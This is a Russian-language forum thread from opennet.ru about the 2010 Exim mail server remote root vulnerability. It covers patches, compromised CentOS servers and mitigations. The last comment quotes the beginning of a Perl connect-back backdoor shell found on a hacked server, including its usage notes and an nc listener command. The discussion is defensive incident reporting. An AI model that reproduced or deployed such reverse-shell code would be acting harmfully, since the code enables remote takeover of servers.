https://opennet.ru/openforum/vsluhforumID3/73190.html В популярном почтовом сервере Exim найдена (http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html) критическая уязвимость, позволяющая удаленному злоумышленнику выполнить свой код на сервере с привилегиями суперпользователя. Уязвимость была выявлена в результате анализа причин взлома одного из серверов. Проанализировав собранный при помощи tcpdump слепок трафика на момент взлома, было выявлено, что взлом был произведен через определенным образом оформленный в секции "DATA" сверхбольшой блок данных, содержащий в своем теле блок "HeaderX: ${shell-код}". <br><br><br>С целью предотвращения волны проведения атак, до выпуска обновления представлено только общее описание атака, детали не разглашаются. Так как в определенных кругах подробности с методом эксплуатации данной проблемы уже известны, всем администраторам рекомендуется временно заблокировать работу почтового сервера или переконфигурировать (http://www.exim.org/exim-html-3.20/doc/html/spec_55.html) Exim для работы под неприви...<br><br>URL: http://www.exi https://opennet.ru/openforum/vsluhforumID3/73190.html#127 Mon, 10 Jun 2019 18:36:17 GMT Вопрос к профессионалам от Нуба<br>Можно ли защититься от этой проблемы косвенным образом.<br>Чтобы не перехватили root - Поставить при авторизации запрет на доступ для всех по IP кроме одного своего ?<br> https://opennet.ru/openforum/vsluhforumID3/73190.html#126 Thu, 23 Dec 2010 15:30:33 GMT &gt; Ну а я считаю, что он прав. Насчет криворукости того админа тоже. <br>&gt; Не сочтите за флуд, но у меня почтовик(Exim) обслуживает 15 доменов <br>&gt; и рассылку(почти 400 000 писем в день). Ни разу за 5 <br>&gt; лет не было нареканий по поводу его работы. О "buffer overflow" <br>&gt; вообще только в сказках слышал.<br><br>Очевидно, что Вам<br>a) Повезло<br>b) Changelog'и Вы ну совсем не читаете.<br><br> https://opennet.ru/openforum/vsluhforumID3/73190.html#125 Sun, 19 Dec 2010 00:11:13 GMT &gt; также систему на centos поломали. есть ли версия 4.70 exim.x86_64 для centos?? <br><br>Для CentOS вышло обновление. Это не 4.70, но уязвимость там пофикшена.<br> https://opennet.ru/openforum/vsluhforumID3/73190.html#124 Thu, 16 Dec 2010 12:45:12 GMT ещё и dovecot накрылся(( вся входящая почта пропала и новые письма не приходят( это только у меня такой эффект вышел?<br> https://opennet.ru/openforum/vsluhforumID3/73190.html#123 Thu, 16 Dec 2010 11:49:44 GMT также систему на centos поломали. есть ли версия 4.70 exim.x86_64 для centos??<br> https://opennet.ru/openforum/vsluhforumID3/73190.html#122 Wed, 15 Dec 2010 04:41:04 GMT &gt;[оверквотинг удален]<br>&gt;&gt; HeaderX <br>&gt;&gt; http://www.exim.org/lurker/message/20101209.112914.68af6769.en.html <br>&gt; В Дебиане уже все пофикшено.<br>&gt; exim4 (4.69-9+lenny1) stable-security; urgency=high <br>&gt; * Non-maintainer upload by the Security Team.<br>&gt; * Fix SMTP file descriptors being leaked to processes invoked <br>&gt; with ${run...} <br>&gt; * Fix memory corruption issue in string_format(). CVE-2010-4344 <br>&gt; * Fix potential memory pool corruption issue in internal_lsearch_find().<br>&gt; -- Stefan Fritsch &lt;sf@debian.org&gt; Fri, 10 Dec 2010 13:25:07 +0100 <br><br>Это должно было бы пофиксено два Exim`овскиз релиза назад, а не когда за яйца уже схватили!!!!!!!!! Обновления безопасности же наверно не так просто выходят, а?<br> https://opennet.ru/openforum/vsluhforumID3/73190.html#121 Wed, 15 Dec 2010 04:39:15 GMT Переставить систему<br> https://opennet.ru/openforum/vsluhforumID3/73190.html#120 Tue, 14 Dec 2010 21:46:41 GMT &gt;&gt;&gt; 4) Если бы все было так просто как вы написали - не <br>&gt;&gt;&gt; заморачивались бы рейд вендоры BBU, а вендору БД - ACID транзакциями.<br>&gt;&gt;&gt; Для меня вот - потеря спула является критичным фейлом, так как <br>&gt;&gt;&gt; при этом потеряется огромное количество писем и я даже не смогу <br>&gt;&gt;&gt; сказать что именно было потеряно.<br>&gt;&gt; для меня - тока в одном месте эта потеря являтся критической.<br>&gt;&gt; но там /var отдельно.<br>&gt; ууу... еще и вар не отдельной фс, как все печально у вас, <br>&gt; однако.<br><br>та. последнее время стал старый и ленивый, и балуюсь таким<br><br>srv0$ df -h<br>Filesystem Size Used Avail Capacity Mounted on<br>/dev/label/rootFS 15G 5.0G 8.4G 37% /<br>devfs 1.0K 1.0K 0B 100% /dev<br>/dev/label/homeFS 117G 49G 58G 46% /home<br>tmpfs 7.0G 620K 7.0G 0% /tmp<br>linprocfs 4.0K 4.0K 0B 100% /proc<br> https://opennet.ru/openforum/vsluhforumID3/73190.html#119 Tue, 14 Dec 2010 17:04:53 GMT Блин, поломали. <br>Стоит CentOS release 5.4 (Final) с exim 4.63-3.el5. Залили в /tmp/c.pl какой-то бэкдор:<br>cat /tmp/c.pl<br>#!/usr/bin/perl<br>use IO::Socket;<br># Priv8 ** Priv8 ** Priv8<br># IRAN HACKERS SABOTAGE Connect Back Shell<br># code by:LorD<br># We Are :LorD-C0d3r-NT-\x90<br># Email:LorD@ihsteam.com<br>#<br>#lord@SlackwareLinux:/home/programing$ perl dc.pl<br>#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--<br>#<br>#Usage: dc.pl [Host] [Port]<br>#<br>#Ex: dc.pl 127.0.0.1 2121<br>#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121<br>#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--<br>#<br>#[*] Resolving HostName<br>#[*] Connecting... 127.0.0.1<br>#[*] Spawning Shell<br>#[*] Connected to remote host<br><br>#bash-2.05b# nc -vv -l -p 2121<br>#listening on [any] 2121 ...<br>#connect to [127.0.0.1] from localhost [127.0.0.1] 32769<br>#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--<br>#<br>#--==Systeminfo==--<br>#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39